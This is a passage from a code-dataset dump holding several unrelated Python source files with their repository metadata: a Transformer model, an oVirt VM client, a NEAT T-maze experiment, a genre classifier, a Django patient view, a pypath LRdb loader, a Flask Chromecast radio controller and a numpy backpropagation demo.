并不是因为抑制信息泄漏,而是屏蔽对结果没有意义的字符而产生的注意力的值,以此提升模型效果和训练速度(输入中无用的字符?)\n x = self.subLayers[1](x, lambda x : self.self_attn(x, m, m, src_mask))\n \n return self.subLayers[2](x, self.ff)\n\nclass Decoder(nn.Module):\n def __init__(self, layer, N):\n super().__init__()\n self.norm = LayerNorm(layer.d_model)\n self.layers = clone_modules(layer, N)\n \n def forward(self, x, m, tgt_mask, src_mask):\n for layer in self.layers:\n x = layer(x, m, tgt_mask, src_mask)\n \n return self.norm(x)\n\nclass Generator(nn.Module):\n def __init__(self, d_model, vocab_size) -> None:\n super().__init__()\n self.project = nn.Linear(d_model, vocab_size)\n \n def forward(self, x):\n # log_softmax 和 softmax 对于最终的输出是没有影响的,\n # 但是可以解决 softmax 数值不稳定的现象\n return F.log_softmax(self.project(x), -1)\n \nclass EncoderDecoder(nn.Module):\n def __init__(self, encoder, decoder, src_embed, tgt_embed, generator):\n super().__init__()\n self.encoder = encoder\n self.decoder = decoder\n self.src_embed = src_embed\n self.tgt_embed = tgt_embed\n self.generator = generator\n \n def forward(self, src, tgt, src_mask, tgt_mask):\n return self.generator(\n self.decode(\n self.encode(src, src_mask), src_mask, tgt, tgt_mask))\n \n def encode(self, src, src_mask):\n return self.encoder(self.src_embed(src), src_mask)\n \n def decode(self, m, src_mask, tgt, tgt_mask):\n return self.decoder(self.tgt_embed(tgt), m, src_mask, tgt_mask)\n \n# 构建用于 transformer 的模型\ndef make_model(src_vocab, tgt_vocab, N=6, \n d_model=512, d_ff=2048, head=8, p_dropout=0.1):\n # 初始化一些需要公用的层,后面使用deepcopy,\n attn = MultiHeadedAttention(head, d_model)\n ff = PositionwiseFeedForward(d_model, d_ff, p_dropout)\n pos_layer = PositionEmbedding(d_model, p_dropout)\n \n # 初始化我们的模型\n model = EncoderDecoder(\n Encoder(EncoderLayer(d_model, c(attn), c(ff), p_dropout), N),\n Decoder(DecoderLayer(d_model, c(attn), c(attn), c(ff), p_dropout), N),\n nn.Sequential(Embedding(d_model, src_vocab), c(pos_layer)),\n nn.Sequential(Embedding(d_model, src_vocab), c(pos_layer)),\n Generator(d_model, tgt_vocab)\n )\n \n # 初始化那些参数维度大于一的,将其初始化为服从均匀分布的矩阵。显示的设置模型参数\n for p in model.parameters():\n if p.dim() > 1:\n nn.init.xavier_uniform(p)\n \n return model","repo_name":"Shaohu-Li/Learn-Transformer","sub_path":"transformer.py","file_name":"transformer.py","file_ext":"py","file_size_in_byte":12485,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"41301459260","text":"from ovirtsdk.api import API\nfrom ovirtsdk.infrastructure.errors \\\n import NoCertificatesError, RequestError, ConnectionError\n\napi = None\n\n\nclass OvirtApi(object):\n def login(self, url, username, password, ca_file):\n global api\n try:\n api = API(url=url,\n username=username,\n password=password,\n ca_file=ca_file)\n except RequestError as reqErr:\n return False, \"Login error\"\n except ConnectionError as conErr:\n return False, \"Bad URL\"\n except NoCertificatesError as certErr:\n return False, \"SSL error. Use 'http(s)://'\"\n except Exception as e:\n return False, str(e)\n return True, ''\n\n def getUserVms(self):\n global api\n return api.vms.list()\n\n def getVmById(self, id):\n global api\n return api.vms.get(id=id)\n\n def getVmStatus(self, id):\n global api\n return api.vms.get(id=id).status.state\n\n def startVm(self, vmid):\n global api\n try:\n api.vms.get(id=vmid).start()\n except RequestError as reqErr:\n return False, reqErr.reason, reqErr.detail\n except ConnectionError as conErr:\n return False, 'Connection Error'\n return True, None, None\n\n def stopVm(self, vmid):\n global api\n try:\n api.vms.get(id=vmid).stop()\n except RequestError as reqErr:\n return False, reqErr.reason, reqErr.detail\n except ConnectionError as conErr:\n return False, 'Connection Error'\n return True, None, None\n\n def ticketVm(self, vmid):\n global api\n try:\n ticket = api.vms.get(id=vmid).ticket()\n value = ticket.get_ticket().get_value()\n expiry = ticket.get_ticket().get_expiry()\n return value, expiry\n except RequestError as reqErr:\n raise Exception(reqErr.reason, reqErr.detail)\n except ConnectionError as conErr:\n raise Exception('Connection Error', '')\n","repo_name":"oVirt/samples-portals","sub_path":"python-gtk/dispatcher.py","file_name":"dispatcher.py","file_ext":"py","file_size_in_byte":2085,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"27417847340","text":"import click\nimport multiprocessing\nimport os\n\nimport numpy as np\n\nimport t_maze_env\nfrom neuroevolution.activation_functions import tanh_act\nfrom neuroevolution.adaptive_linear import AdaptiveLinearNetwork\nfrom neuroevolution.config import Config\nfrom neuroevolution.genome import DefaultGenome\nfrom neuroevolution.multienv_eval import MultiEnvEvaluator\nfrom neuroevolution.population import Population\nfrom neuroevolution.reporting import LogReporter, StatisticsReporter, StdOutReporter\nfrom neuroevolution.reproduction import DefaultReproduction\nfrom neuroevolution.species import DefaultSpeciesSet\nfrom neuroevolution.stagnation import DefaultStagnation\n\nbatch_size = 4\nDEBUG = True\n\n\ndef make_net(genome, config, _batch_size):\n input_coords = [[-1.0, 0.0], [0.0, 0.0], [1.0, 0.0], [0.0, -1.0]]\n output_coords = [[-1.0, 0.0], [0.0, 0.0], [1.0, 0.0]]\n return AdaptiveLinearNetwork.create(\n config,\n genome,\n in_coords=input_coords,\n out_coords=output_coords,\n weights_threshold=0.4,\n batch_size=_batch_size,\n activation=tanh_act,\n out_activation=tanh_act,\n device=\"cpu\",\n )\n\ndef activate_net(net, states, debug=False, step_num=0):\n if debug and step_num == 1:\n print(\"\\n\" + \"=\" * 20 + \" DEBUG \" + \"=\" * 20)\n print(net.delta_w_node)\n print(\"W init: \", net.in2out[0])\n outputs = net.activate(states).numpy()\n if debug and (step_num - 1) % 100 == 0:\n print(\"\\nStep {}\".format(step_num - 1))\n print(\"Outputs: \", outputs[0])\n print(\"Delta W: \", net.delta_w[0])\n print(\"W: \", net.in2out[0])\n return np.argmax(outputs, axis=1)\n\n\n@click.command()\n@click.option(\"--n_generations\", type=int, default=10000)\n@click.option(\"--n_processes\", type=int, default=1)\ndef run(n_generations, n_processes):\n # Load the config file, which is assumed to live in\n # the same directory as this script.\n config_path = os.path.join(os.path.dirname(__file__), \"t_maze.cfg\")\n config = Config(DefaultGenome, DefaultReproduction, DefaultSpeciesSet,\n DefaultStagnation, config_path)\n\n envs = [t_maze_env.TMazeEnv(init_reward_side=i, n_trials=100) for i in [1, 0, 1, 0]]\n\n evaluator = MultiEnvEvaluator(make_net, activate_net, envs=envs,\n batch_size=batch_size, max_env_steps=1000\n )\n\n if n_processes > 1:\n pool = multiprocessing.Pool(processes=n_processes)\n\n def eval_genomes(genomes, config):\n fitnesses = pool.starmap(evaluator.eval_genome,\n ((genome, config) for _, genome in genomes))\n for (_, genome), fitness in zip(genomes, fitnesses):\n genome.fitness = fitness\n\n else:\n\n def eval_genomes(genomes, config):\n for i, (_, genome) in enumerate(genomes):\n try:\n genome.fitness = evaluator.eval_genome(genome, config,\n debug=DEBUG and i % 100 == 0)\n except Exception as e:\n print(genome)\n raise e\n\n pop = Population(config)\n stats = StatisticsReporter()\n pop.add_reporter(stats)\n reporter = StdOutReporter(True)\n pop.add_reporter(reporter)\n logger = LogReporter(\"log.json\", evaluator.eval_genome)\n pop.add_reporter(logger)\n\n winner = pop.run(eval_genomes, n_generations)\n\n print(winner)\n final_performance = evaluator.eval_genome(winner, config)\n print(\"Final performance: {}\".format(final_performance))\n generations = reporter.generation + 1\n return generations\n\n\nif __name__ == \"__main__\":\n run() # pylint: disable=no-value-for-parameter\n","repo_name":"inigo-irigaray/NEAT-neuroevolution-pytorch","sub_path":"t_maze.py","file_name":"t_maze.py","file_ext":"py","file_size_in_byte":3724,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"19724657160","text":"import pandas as pd\r\nimport numpy as np\r\nimport seaborn as sns\r\nfrom sklearn.preprocessing import LabelEncoder\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.preprocessing import StandardScaler\r\nfrom sklearn.linear_model import LogisticRegression\r\nfrom sklearn.naive_bayes import GaussianNB\r\nfrom sklearn.neighbors import KNeighborsClassifier\r\nfrom sklearn.metrics import mean_squared_error\r\nfrom sklearn.tree import DecisionTreeClassifier\r\nimport tensorflow as tf\r\n\r\ndef mis_classified(original, predicted):\r\n # Counting the number of values that has been mis-classified \r\n value = 0\r\n for i in range(len(original)):\r\n if(original[i]!=predicted[i]):\r\n value+=1\r\n return value\r\n\r\n\r\ndef print_metrics(data, error, missed = 0):\r\n # Printing the error and the number of the values that has been misclassified\r\n print(\"\\t\", data)\r\n print(\"\\t\\t Mean Squared Error:\", error)\r\n print(\"\\t\\t Missed value:\", missed)\r\n\r\n\r\ndef process_data():\r\n # Reading the file\r\n audio_data = pd.read_csv(\"audio_data.csv\")\r\n audio_data.drop(['Unnamed: 0'], inplace=True, axis = 1)\r\n\r\n # Checking the file\r\n # audio_data.head()\r\n\r\n # audio_data.describe()\r\n\r\n # Checking if there is any null value\r\n # audio_data.isnull.sum()\r\n\r\n # Encoding the \"genre_top\" as 0 and 1\r\n encoder = LabelEncoder()\r\n audio_data[\"genre_top\"] = encoder.fit_transform(audio_data[\"genre_top\"])\r\n # It labels Hip_Hop as zero and Rock as One\r\n\r\n # finding the co-relation for Feature Selection\r\n audio_data_features = audio_data[audio_data.columns[:-1]]\r\n corelation = audio_data_features.corr()\r\n\r\n # Plotting the co-relation on a graph\r\n sns.heatmap(corelation, annot= True)\r\n\r\n # we will drop the columns that have more then 70% corelation\r\n corr = set()\r\n threshold = 0.7\r\n for i in range(len(corelation)):\r\n for j in range(len(corelation)):\r\n if abs(corelation.iloc[i,j])>threshold and corelation.iloc[i,j]!=1:\r\n corr.add(corelation.columns[i])\r\n # print(corr)\r\n # As the set is empty, we get to know that there is no string relationship in the features.\r\n\r\n X = audio_data_features\r\n y = audio_data[\"genre_top\"]\r\n\r\n # Now, Our data is ready for the train test splitting\r\n X_train, X_ , y_train , y_ = train_test_split(X, y , train_size=0.6, random_state=42)\r\n X_cv, X_test, y_cv, y_test = train_test_split(X_, y_ , train_size=0.5, random_state=42)\r\n\r\n # Scaling the Data\r\n scaler = StandardScaler()\r\n X_train = scaler.fit_transform(X_train)\r\n X_cv = scaler.transform(X_cv)\r\n X_test = scaler.transform(X_test)\r\n\r\n y_train = np.array(y_train)\r\n y_cv = np.array(y_cv)\r\n y_test = np.array(y_test)\r\n\r\n return X_test, y_test, X_cv, y_cv, X_train, y_train\r\n\r\ndef Prediction_Model():\r\n\r\n X_test, X_cv, y_test, y_cv, X_train, y_train = process_data()\r\n\r\n # Using Different Algorithms to predict the data\r\n logistic_Regression = LogisticRegression()\r\n GuassianNB = GaussianNB()\r\n kneighbours = KNeighborsClassifier(n_neighbors=10)\r\n Decision_Tree = DecisionTreeClassifier()\r\n ml_Algorithms = [logistic_Regression, GuassianNB, Decision_Tree, kneighbours]\r\n\r\n file = open (\"result.txt\", \"w\")\r\n for i in ml_Algorithms:\r\n model = i\r\n model.fit(X_train, y_train)\r\n y_pred = model.predict(X_train)\r\n error1 = mean_squared_error(y_train, y_pred)\r\n missed1 = mis_classified(y_train, y_pred)\r\n \r\n y_pred = model.predict(X_cv)\r\n error2 = mean_squared_error(y_cv, y_pred)\r\n missed2 = mis_classified(y_cv, y_pred)\r\n \r\n y_pred = model.predict(X_test)\r\n error3 = mean_squared_error(y_test, y_pred)\r\n missed3 = mis_classified(y_test, y_pred)\r\n \r\n print(i,\":\")\r\n print_metrics(\"Training data\", error1, missed1)\r\n print_metrics(\"Cross_Validation data\", error2, missed2)\r\n print_metrics(\"Testing data\", error3, missed3)\r\n file.write(f\"{i}\\n{error1} {error2} {error3} {missed1} {missed2} {missed3} \\n\")\r\n print(\"\\n\\n\")\r\n\r\n data = X_train\r\n # Using Neural Networks to predict the song\r\n model = tf.keras.Sequential([\r\n tf.keras.Input((None, 2881, 9)),\r\n tf.keras.layers.Dense(units=1000, activation=\"relu\"),\r\n tf.keras.layers.Dense(units=500, activation=\"relu\"),\r\n tf.keras.layers.Dense(units=100, activation=\"relu\"),\r\n tf.keras.layers.Dense(units=1, activation=\"softmax\")]\r\n )\r\n\r\n model.compile(optimizer='adam',\r\n loss=tf.keras.losses.BinaryCrossentropy())\r\n\r\n history = model.fit(X_train, y_train, epochs=100)\r\n\r\n y_pred = model.predict(X_train)\r\n error1 = mean_squared_error(y_train, y_pred)\r\n missed1 = mis_classified(y_train, y_pred)\r\n\r\n y_pred = model.predict(X_cv)\r\n error2 = mean_squared_error(y_cv, y_pred)\r\n missed2 = mis_classified(y_cv, y_pred)\r\n\r\n y_pred = model.predict(X_test)\r\n error3 = mean_squared_error(y_test, y_pred)\r\n missed3 = mis_classified(y_test, y_pred)\r\n\r\n print(\"Neural Network\",\":\")\r\n print_metrics(\"Training data\", error1, missed1)\r\n print_metrics(\"Cross_Validation data\", error2, missed2)\r\n print_metrics(\"Testing data\", error3, missed3)\r\n file.write(f\"Neural Network\\n{error1} {error2} {error3} {missed1} {missed2} {missed3} \\n\")\r\n\r\n file.close()\r\n\r\ndef final_algorithm():\r\n # After analyzing all the models, KNeighborsClassifier seems to be the most suitable one\r\n X_test, y_test, X_cv, y_cv, X_train, y_train = process_data()\r\n kneighbours = KNeighborsClassifier(n_neighbors=10)\r\n model = kneighbours\r\n model.fit(X_train, y_train)\r\n return model\r\n\r\nif __name__==\"__main__\":\r\n Prediction_Model()","repo_name":"anamfatima1304/Songs_Prediction","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5795,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18771340149","text":"from django.shortcuts import redirect, render\nfrom django.http import HttpResponse\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib import messages\nfrom django.contrib.messages import constants\nfrom . models import Pacientes\n\n\n@login_required(login_url='/auth/logar/')\ndef pacientes(request):\n if request.method == \"GET\":\n pacientes = Pacientes.objects.filter(nutri = request.user)\n return render(request, 'pacientes.html', {'pacientes': pacientes})\n elif request.method == \"POST\":\n nome = request.POST.get('nome')\n sexo = request.POST.get('sexo')\n idade = request.POST.get('idade')\n email = request.POST.get('email')\n telefone = request.POST.get('telefone')\n\n if (len(nome.strip()) == 0) or (len(sexo.strip()) == 0) or (len(email.strip()) == 0) or (len(idade.strip()) == 0) or (len(telefone.strip()) == 0):\n messages.add_message(request, constants.ERROR, 'Preencha todos os campos!')\n return redirect('/pacientes/')\n \n \n if not idade.isnumeric():\n messages.add_message(request, constants.ERROR, 'Digite uma idade válida')\n return redirect('/pacientes/')\n\n pacientes = Pacientes.objects.filter(email=email)\n\n if pacientes.exists():\n messages.add_message(request, constants.ERROR, 'Já existe um paciente com esse E-mail.')\n return redirect('/pacientes/')\n \n try:\n paciente = Pacientes(nome=nome,\n sexo=sexo,\n idade=idade,\n email=email,\n telefone=telefone,\n nutri=request.user)\n \n paciente.save()\n messages.add_message(request, constants.SUCCESS, 'Paciente cadastrado com sucesso!') \n return redirect('/pacientes/')\n except:\n messages.add_message(request, constants.ERROR, 'Erro interno do sistema!')\n return redirect('/pacientes/')\n\n\n\n ","repo_name":"Maia1111/PythonFull_Nutrilab","sub_path":"plataforma/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2088,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70278584429","text":"import csv\nimport collections\n\nimport pypath.share.curl as curl\nimport pypath.resources.urls as urls\nimport pypath.utils.mapping as mapping\nimport pypath.share.common as common\n\n\nLrdbAnnotation = collections.namedtuple(\n 'LrdbAnnotation',\n [\n 'role',\n 'cell_type',\n 'sources',\n 'references',\n ],\n)\n\n\ndef lrdb_interactions():\n\n resource_names = {\n 'reactome': 'Reactome',\n 'fantom5': 'Fantom5',\n 'IUPHAR': 'Guide2Pharma',\n 'uniprot': 'UniProt',\n }\n\n def remove(lst, to_remove):\n to_remove = common.to_set(to_remove)\n\n return [\n it\n for it in lst\n if it not in to_remove\n ]\n\n LrdbRecord = collections.namedtuple(\n 'LrdbRecord',\n [\n 'ligand_genesymbol',\n 'receptor_genesymbol',\n 'sources',\n 'references',\n 'ligand_cells',\n 'receptor_cells',\n ]\n )\n\n url = urls.urls['lrdb']['url']\n\n c = curl.Curl(url, silent = False, large = True)\n\n reader = csv.DictReader(c.result, delimiter = '\\t')\n\n result = []\n\n for rec in reader:\n\n result.append(\n LrdbRecord(\n ligand_genesymbol = rec['ligand'],\n receptor_genesymbol = rec['receptor'],\n sources = [\n resource_names[src] if src in resource_names else src\n for src in\n remove(\n rec['source'].split(','),\n {'literature', ''},\n )\n ],\n references = remove(rec['PMIDs'].split(','), ''),\n ligand_cells = remove(rec['cells.L'].split(','), ''),\n receptor_cells = remove(rec['cells.R'].split(','), ''),\n )\n )\n\n return result\n\n\ndef lrdb_annotations():\n\n result = collections.defaultdict(set)\n\n lrdb = lrdb_interactions()\n\n for rec in lrdb:\n\n for role in ('ligand', 'receptor'):\n\n uniprots = mapping.map_name(\n getattr(rec, '%s_genesymbol' % role),\n 'genesymbol',\n 'uniprot',\n )\n\n for uniprot in uniprots:\n\n cell_types = getattr(rec, '%s_cells' % role) or (None,)\n\n for cell_type in cell_types:\n\n cell_type = (\n 'T lymphocyte'\n if cell_type == 'tymphocyte' else\n cell_type.replace('cells', 'cell')\n if cell_type else\n None\n )\n\n result[uniprot].add(\n LrdbAnnotation(\n role = role,\n cell_type = cell_type,\n sources = tuple(sorted(rec.sources)),\n references = tuple(sorted(rec.references)),\n )\n )\n\n return dict(result)\n","repo_name":"saezlab/pypath","sub_path":"pypath/inputs/lrdb.py","file_name":"lrdb.py","file_ext":"py","file_size_in_byte":3023,"program_lang":"python","lang":"en","doc_type":"code","stars":114,"dataset":"github-code","pt":"37"} +{"seq_id":"17556560362","text":"import pychromecast\nfrom time import sleep\nfrom flask import Flask, request, render_template\n\nCHROMECAST_FRIENDLY_NAME = \"\"\n\n\nclass Queue:\n def __init__(self):\n self.queue = []\n\n def addFunc(self, func):\n if self.queue and self.queue[-1] == func:\n return\n else:\n self.queue.append(func)\n\n def tryExecute(self): #doesnt have check if execution fails\n if self.queue:\n self.queue.pop(0)()\n \n def not_empty(self):\n return bool(self.queue)\n\nclass Listener:\n def __init__(self, mediaFunc=None, connectionFunc=None):\n self.mediaFunc = mediaFunc\n self.connectionFunc = connectionFunc\n\n def new_media_status(self, data):\n if self.mediaFunc is not None:\n self.mediaFunc(data)\n\n def new_connection_status(self, data):\n if self.connectionFunc is not None:\n self.connectionFunc(data)\n\nclass Chromecast:\n def __init__(self, device):\n self.device = device\n self.cast = None\n self.mc = None\n self.chromecasts = None\n self.browser = None\n self.url = None\n self.newUrl = False\n self.isProcessing = False\n self.turnBackOn = False\n self.expectedStatus = \"UNKNOWN\"\n self.commandQueue = Queue()\n self.listener = Listener(self.new_media_status_handler, self.new_connection_status_handler)\n self.connect()\n\n #RANDOM FUNCTIONS\n def waitUntilTrue(self, variable, timeout, period):\n while not eval(variable) and timeout > 0:\n timeout -= period\n sleep(period)\n\n\n #LISTENER HANDLER\n def new_media_status_handler(self, data):\n print(\"NEW STATUS: \", data.player_state)\n\n def new_connection_status_handler(self, data):\n print(\"NEW CONNECTION STATUS: \", data)\n \n #Turn back on after disconnect\n if self.cast is not None:\n if self.turnBackOn and data.status == \"CONNECTED\":\n self.turnBackOn = False\n self.connect()\n self.play()\n\n if data.status == \"LOST\" and self.expectedStatus == \"PLAYING\":\n self.turnBackOn = True\n\n\n #CHROMECAST\n def connect(self, tries=0):\n if self.isProcessing:\n return\n\n self.processing(True)\n try:\n self.disconnect()\n except:\n print(\"disconnect unsuccessful\")\n chromecasts, self.browser = pychromecast.get_listed_chromecasts(friendly_names=[self.device])\n print(chromecasts)\n if not chromecasts:\n print(f'No chromecast with name \"{self.device}\" discovered {tries + 1}')\n tries += 1\n if tries > 5:\n self.processing(False)\n return\n self.processing(False)\n self.connect(tries=tries)\n return\n\n self.cast = chromecasts[0]\n self.cast.wait()\n print('Chromecast ready')\n self.mc = self.cast.media_controller\n self.cast.socket_client.register_connection_listener(self.listener)\n self.mc.register_status_listener(self.listener)\n self.processing(False)\n\n def setMedia(self):\n if self.isProcessing:\n return\n\n if self.checkConnection() and self.url is not None:\n self.processing(True)\n self.newUrl = False\n \n self.mc.play_media(self.url, 'audio/mp3', stream_type=\"LIVE\", autoplay=False)\n self.mc.block_until_active()\n print(\"Trying to play: \", self.url)\n\n if self.mc.status.player_is_paused:\n self.waitUntilTrue('self.mc.status.player_is_idle', 15, 0.01)\n \n self.waitUntilTrue('self.mc.status.player_is_paused', 30, 0.01)\n print(\"UNBLOCKED\")\n self.processing(False)\n\n def processing(self, bool):\n if bool:\n self.isProcessing = True\n else:\n self.isProcessing = False\n\n def checkConnection(self):\n if self.cast is None:\n self.connect()\n\n if self.cast.socket_client.is_stopped:\n print('No chromecast connected, trying to connect')\n self.connect()\n if self.cast.socket_client.is_stopped:\n print('Connection unsuccessful')\n return False\n return True\n \n def checkMedia(self):\n if self.mc is None:\n return False\n\n if self.mc.status.player_state == \"UNKNOWN\" or self.mc.status.player_is_idle or self.newUrl:\n print('No or new media, setting up')\n self.setMedia()\n if self.mc.status.player_state == \"UNKNOWN\":\n print('media setup unsuccessful')\n return False\n return True\n\n def checkProcessing(self, command=None):\n if self.isProcessing:\n if command is not None:\n self.commandQueue.addFunc(command)\n return True\n return False\n\n def checkAll(self, command=None):\n processing = self.checkProcessing(command)\n if processing:\n return False\n\n return self.checkConnection() and self.checkMedia()\n\n\n def setUrl(self, url):\n if self.url != url:\n self.url = url\n self.newUrl = True\n\n #chromecast control functions\n def pause(self):\n if self.checkAll(self.pause):\n print('pausingg')\n self.mc.pause()\n self.expectedStatus = \"PAUSED\"\n self.commandQueue.tryExecute()\n \n def play(self):\n self.newUrl = True #to always set new media and so radio is live\n if self.checkAll(self.play):\n self.mc.play()\n self.expectedStatus = \"PLAYING\"\n self.commandQueue.tryExecute()\n\n def stop(self):\n if self.checkAll(self.stop):\n self.mc.stop()\n self.expectedStatus = \"IDLE\"\n self.commandQueue.tryExecute()\n\n def setVolume(self, value):\n if self.checkAll():\n self.cast.set_volume(value/100)\n #after disconnect doesnt resume playback (not implemented)\n\n def disconnect(self):\n self.cast.disconnect()\n\n def connectNew(self):\n self.connect()\n\n\n def is_playing(self):\n if self.checkConnection():\n self.waitUntilTrue('self.mc.status.player_state != \"UNKNOWN\"', 2, 0.01)\n if self.mc.status.player_is_playing:\n return True\n return False\n\n def get_url(self):\n return self.url\n \n def get_volume(self):\n if self.checkConnection():\n return self.cast.status.volume_level\n return -1\n\n\n#FLASK\napp = Flask(\"SmartHomeRadio\")\n\n@app.route(\"/\")\ndef index():\n return render_template('RadioGui.html')\n\n@app.route(\"/chromecast\", methods=[\"POST\"])\ndef ajax():\n action = request.form.get('action')\n print(f'{action} command received')\n\n if action == 'url':\n chromecast.setUrl(request.form.get('url'))\n \n elif action == 'play':\n chromecast.play()\n \n elif action == 'pause':\n chromecast.pause()\n\n elif action == 'stop':\n chromecast.stop()\n\n elif action == 'volume':\n chromecast.setVolume(float(request.form.get(\"value\")))\n\n elif action == 'disconnect':\n chromecast.disconnect()\n\n elif action == 'connect':\n chromecast.connectNew()\n\n else:\n return ('Bad Data', 400)\n\n print('')\n return \"Success\"\n\n@app.route(\"/setup\", methods=[\"GET\"])\ndef setup():\n data = {\n \"is_playing\": chromecast.is_playing(),\n \"url\": chromecast.get_url(),\n \"volume\": round(chromecast.get_volume()*100)}\n return data\n\n\n#OTHER\nchromecast = Chromecast(CHROMECAST_FRIENDLY_NAME)\n\n\n# \"Audio-Pracovna\" \n# 'https://stream.funradio.sk:18443/fun192.mp3'\n# 'https://stream.bauermedia.sk/rock-hi.mp3'\n# 'https://stream.bauermedia.sk/europa2-hi.mp3?aw_0_req.gdpr=false'\n# 'http://commondatastorage.googleapis.com/gtv-videos-bucket/sample/SubaruOutbackOnStreetAndDirt.mp4'\n# 'http://commondatastorage.googleapis.com/gtv-videos-bucket/sample/ForBiggerFun.mp4'","repo_name":"staudyy/SmartHomeRadio","sub_path":"chromecastServer.py","file_name":"chromecastServer.py","file_ext":"py","file_size_in_byte":8147,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6903649169","text":"# -*- coding: utf-8 -*-\n#单隐层网络\nimport pandas as pd\nimport numpy as np\nfrom sklearn.preprocessing import LabelEncoder\nfrom sklearn.preprocessing import StandardScaler\nimport matplotlib.pyplot as plt\nseed = 2019\nimport random\nnp.random.seed(seed) # Numpy module.\nrandom.seed(seed) # Python random module.\n\nplt.rcParams['font.sans-serif'] = ['SimHei'] #用来正常显示中文标签\nplt.rcParams['axes.unicode_minus'] = False #用来正常显示负号\nplt.close('all')\n\ndef preprocess(data):\n #1.将非数映射数字\n for title in data.columns:\n if data[title].dtype=='object':\n encoder = LabelEncoder()\n data[title] = encoder.fit_transform(data[title])\n #2.去均值和方差归一化\n ss = StandardScaler()\n X = data.drop('好瓜',axis=1)\n Y = data['好瓜']\n X = ss.fit_transform(X)\n x,y = np.array(X),np.array(Y).reshape(Y.shape[0],1)\n return x,y\n#定义Sigmoid,求导\ndef sigmoid(x):\n return 1/(1+np.exp(-x))\ndef d_sigmoid(x):\n return x*(1-x)\n\n##累积BP算法\ndef accumulate_BP(x,y,dim=10,eta=0.8,max_iter=500):\n n_samples = x.shape[0]\n w1 = np.zeros((x.shape[1],dim))\n b1 = np.zeros((n_samples,dim))\n w2 = np.zeros((dim,1))\n b2 = np.zeros((n_samples,1))\n losslist = []\n for ite in range(max_iter):\n ##前向传播\n u1 = np.dot(x,w1)+b1\n out1 = sigmoid(u1)\n u2 = np.dot(out1,w2)+b2\n out2 = sigmoid(u2)\n loss = np.mean(np.square(y - out2))/2\n losslist.append(loss)\n print('iter:%d loss:%.4f'%(ite,loss))\n ##反向传播\n ##标准BP\n d_out2 = -(y - out2)\n d_u2 = d_out2*d_sigmoid(out2)\n d_w2 = np.dot(np.transpose(out1),d_u2)\n d_b2 = d_u2\n d_out1 = np.dot(d_u2,np.transpose(w2))\n d_u1 = d_out1*d_sigmoid(out1)\n d_w1 = np.dot(np.transpose(x),d_u1)\n d_b1 = d_u1\n ##更新\n w1 = w1 - eta*d_w1\n w2 = w2 - eta*d_w2\n b1 = b1 - eta*d_b1\n b2 = b2 - eta*d_b2\n ##Loss可视化\n plt.figure()\n plt.plot([i+1 for i in range(max_iter)],losslist)\n plt.legend(['accumlated BP'])\n plt.xlabel('iteration')\n plt.ylabel('loss')\n plt.show()\n return w1,w2,b1,b2\n\n##标准BP算法\ndef standard_BP(x,y,dim=10,eta=0.8,max_iter=500):\n n_samples = 1\n w1 = np.zeros((x.shape[1],dim))\n b1 = np.zeros((n_samples,dim))\n w2 = np.zeros((dim,1))\n b2 = np.zeros((n_samples,1))\n losslist = []\n for ite in range(max_iter):\n loss_per_ite = []\n for m in range(x.shape[0]):\n xi,yi = x[m,:],y[m,:]\n xi,yi = xi.reshape(1,xi.shape[0]),yi.reshape(1,yi.shape[0])\n ##前向传播\n u1 = np.dot(xi,w1)+b1\n out1 = sigmoid(u1)\n u2 = np.dot(out1,w2)+b2\n out2 = sigmoid(u2)\n loss = np.square(yi - out2)/2\n loss_per_ite.append(loss)\n print('iter:%d loss:%.4f'%(ite,loss))\n ##反向传播\n ##标准BP\n d_out2 = -(yi - out2)\n d_u2 = d_out2*d_sigmoid(out2)\n d_w2 = np.dot(np.transpose(out1),d_u2)\n d_b2 = d_u2\n d_out1 = np.dot(d_u2,np.transpose(w2))\n d_u1 = d_out1*d_sigmoid(out1)\n d_w1 = np.dot(np.transpose(xi),d_u1)\n d_b1 = d_u1\n ##更新\n w1 = w1 - eta*d_w1\n w2 = w2 - eta*d_w2\n b1 = b1 - eta*d_b1\n b2 = b2 - eta*d_b2\n losslist.append(np.mean(loss_per_ite))\n ##Loss可视化\n plt.figure()\n plt.plot([i+1 for i in range(max_iter)],losslist)\n plt.legend(['standard BP'])\n plt.xlabel('iteration')\n plt.ylabel('loss')\n plt.show()\n return w1,w2,b1,b2\n\ndef main():\n data = pd.read_table('watermelon30.txt',delimiter=',')\n data.drop('编号',axis=1,inplace=True)\n x,y = preprocess(data)\n dim = 10\n# _,_,_,_ = standard_BP(x,y,dim)\n w1,w2,b1,b2 = accumulate_BP(x,y,dim)\n #测试\n u1 = np.dot(x,w1)+b1\n out1 = sigmoid(u1)\n u2 = np.dot(out1,w2)+b2\n out2 = sigmoid(u2)\n y_pred = np.round(out2)\n result = pd.DataFrame(np.hstack((y,y_pred)),columns=['真值','预测'] )\n result.to_excel('result_numpy.xlsx',index=False)\n\nif __name__=='__main__':\n main()\n","repo_name":"ouguiliang110/NaiveBayesNetCheck","sub_path":"NW-NBC/累计BP算法.py","file_name":"累计BP算法.py","file_ext":"py","file_size_in_byte":4260,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"13083049918","text":"import pymysql\nfrom config import Config\n\nclass Connection:\n def __init__(self):\n self.con = pymysql.connect(\n host = Config.HOST,\n port = Config.PORT,\n user = Config.USER,\n password = Config.PASSWORD,\n db = Config.DBNAME,\n autocommit=True,\n charset = 'utf8mb4',\n cursorclass = pymysql.cursors.DictCursor\n )\n self.cur = self.con.cursor()\n\n def _select(self,sql,args=None):\n self.cur.execute(sql,args)\n self.sel = self.cur.fetchone()\n self.cur.close()\n self.con.close()\n return self.sel\n\n def _selectAll(self,sql,args=None):\n self.cur.execute(sql,args)\n self.sel = 